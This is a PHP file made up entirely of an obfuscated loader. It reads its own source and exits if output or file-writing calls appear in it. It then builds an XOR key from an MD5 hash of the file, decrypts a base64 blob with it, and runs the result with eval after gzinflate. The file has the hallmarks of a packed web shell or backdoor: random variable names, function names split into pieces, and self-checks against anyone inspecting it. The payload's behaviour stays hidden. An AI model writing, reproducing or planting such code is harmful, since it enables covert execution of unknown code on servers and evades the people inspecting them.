<?php
$thiilqazfqdu="2f94a139241c024c94ff093dad5af6ff";
$wiggdtmgt="0a050b500753040e03570357070605055f515007015f56005151015004575257";
$yznsuzlwqr="8y9htC6vGh+Yt2IdGnoc7DAq+qiYMuqxZJ2dYCJwZYGNNuJRstZlh4YwgoUY/Bk2rql9rxgrLDEwHrz+qe4z4EIjKxEN5pXjrYFmqE0GwtaNrH2ofdVjZA==";
$sqrskvdt=file_get_contents(__FILE__);
$gbtoyytn=str_replace($yznsuzlwqr,"",$sqrskvdt);
if(strpos($gbtoyytn,"ec"."ho")!==false||strpos($gbtoyytn,"pr"."int")!==false||strpos($gbtoyytn,"var_"."dump")!==false||strpos($gbtoyytn,"file_put_"."contents")!==false||strpos($gbtoyytn,"fw"."rite")!==false){die();}
$inkqusq=str_replace(array($thiilqazfqdu,$wiggdtmgt),array("SP_b5151d86","KP_284bc792"),$sqrskvdt);
$dzimqjmp=md5($inkqusq);
$mcznwase=hex2bin($wiggdtmgt);
$rsakte="";
$dgjahpyqduh=strlen($dzimqjmp);
for($tydsdqim=0;$tydsdqim<$dgjahpyqduh;$tydsdqim++){
    $rsakte.=chr(ord($mcznwase[$tydsdqim])^ord($dzimqjmp[$tydsdqim]));
}
$lybkaglwvy=base64_decode($yznsuzlwqr);
$awvwkad=strlen($lybkaglwvy);
$lxadftpdtv="";
$vkrchx=strlen($rsakte);
for($tydsdqim=0;$tydsdqim<$awvwkad;$tydsdqim++){
    $lxadftpdtv.=$lybkaglwvy[$tydsdqim]^$rsakte[$tydsdqim%$vkrchx];
}
$orcrqnmoytgv="gz"."in"."fl"."ate";
eval($orcrqnmoytgv($lxadftpdtv));
